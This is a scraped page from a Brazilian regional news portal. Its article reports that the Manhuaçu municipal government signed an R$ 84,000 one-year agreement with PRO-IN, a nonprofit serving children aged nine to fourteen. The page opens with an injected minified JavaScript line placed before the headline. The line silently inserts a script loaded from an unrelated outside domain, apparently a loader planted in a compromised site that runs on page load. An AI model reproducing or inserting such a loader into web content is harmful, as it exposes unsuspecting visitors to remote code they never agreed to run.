;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Governo de Manhuaçu assina convenio para beneficiar atendimento do PRO-IN. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Governo de Manhuaçu assina convenio para beneficiar atendimento do PRO-IN.

A Associação Projeto Integrar – PRO-IN, sem fins lucrativos, trabalha desde 2007 com atendimento a crianças carentes na faixa etária de nove a catorze anos. Atualmente são cerca de cem menores beneficiados pelas oficinas e projetos esportivos. Para ampliar esse quantitativo de atendimento e implementar programas de risco social, o Governo de Manhuaçu firmou convênio no valor de R$ 84 mil com a instituição, que serão repassados ao longo de um ano.
“Atendemos a dezenas de crianças e este projeto ajuda cada uma a ter melhores condições de vida” – lembra Jorge Ferreira, um dos responsáveis pelo projeto durante audiência na Câmara de Vereadores. O prefeito Nailton Heringer, durante a assinatura do convênio destacou: “Com esse convênio a capacidade de atendimento do PRO-IN vai dobrar, abençoando essa instituição que tem feito muito sem usar nenhum recurso público” – disse.
O Executivo municipal já mantém convênio com outras instituições que tem como objetivo atuar na área social, assistindo crianças e adolescentes, como a Darei e a Casa de Recuperação Santa Mãe da Providência, por exemplo. “É um trabalho complexo, duro, árduo, onde essas instituições utilizam toda metodologia psicológica, lúdica e esportiva para recuperar essas crianças” – defende o prefeito Nailton Heringer.

DSC_0042 (4)
Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.